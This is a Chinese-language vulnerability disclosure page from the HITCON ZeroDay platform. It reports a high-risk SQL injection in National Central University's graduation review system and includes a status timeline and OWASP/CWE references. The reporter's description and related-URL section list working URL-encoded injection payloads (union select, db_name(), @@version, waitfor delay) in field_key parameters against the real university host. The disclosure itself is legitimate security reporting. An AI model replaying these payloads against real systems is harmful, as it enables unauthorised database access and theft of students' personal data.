Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00288
- Vendor: 國立中央大學
- Title: 中央大學畢業審核管理系統存在SQL Injection漏洞
- Introduction: SQL Injection
處理狀態
目前狀態
公開
Last Update : 2023/08/19
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/06/19 00:21:25 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
- 2023/06/19 00:23:43 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
- 2023/06/19 00:24:32 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
- 2023/06/26 09:43:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/07/05 17:22:16 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/07/05 17:22:16 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/07/05 17:22:16 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/08/19 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00288
- 通報者:lebr0n_li (wqwfeoipwqjfpwiejfdpioqweoifjqwf)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=degree_condition2&IS_ACTION=display&target=_blank&field_key[0]=x%27union%20select%20db_name(),2,3,4,5,6,7,@@version,9;waitfor%20delay%20%270:0:0%27;--&field_key[1]=2&field_key[2]=0&field_key[3]=0&field_key[4]=20000
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=graduate_rule&IS_ACTION=display&field_key[0]=%27%20union%20select%201,2,3,4,5%20order%20by%205--
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=department&IS_ACTION=display&target=_blank&field_key[0]=0000%27--&field_key[1]=0&field_key[2]=0000&field_key[3]=0
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=crs&IS_ACTION=display&target=_blank&field_key[0]=Z10370%27--
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=graduate_rule&IS_ACTION=display&field_key[0]=%27%20union%20select%201,2,3,4,5%20order%20by%205--
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=department&IS_ACTION=display&target=_blank&field_key[0]=0000%27--&field_key[1]=0&field_key[2]=0000&field_key[3]=0
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=crs&IS_ACTION=display&target=_blank&field_key[0]=Z10370%27--
敘述
很多地方有field_key字眼的欄位都沒有過濾使用者的輸入,導致有SQL Injection發生:
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=degree_condition2&IS_ACTION=display&target=_blank&field_key[0]=x%27union%20select%20db_name(),2,3,4,5,6,7,@@version,9;waitfor%20delay%20%270:0:0%27;--&field_key[1]=2&field_key[2]=0&field_key[3]=0&field_key[4]=20000
https://cis.ncu.edu.tw/grad/index.php?IS_TYPE=graduate_rule&IS_ACTION=display&field_key[0]=%27%20union%20select%201,2,3,4,5%20order%20by%205--
沒有進一步做測試,但由於網站跟畢業審核有關,理論上能query到的重要資料應該蠻多的,建議盡快修補
另外網站看起來很舊了,或許還有其他地方有相似問題,建議也一併檢查一下
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。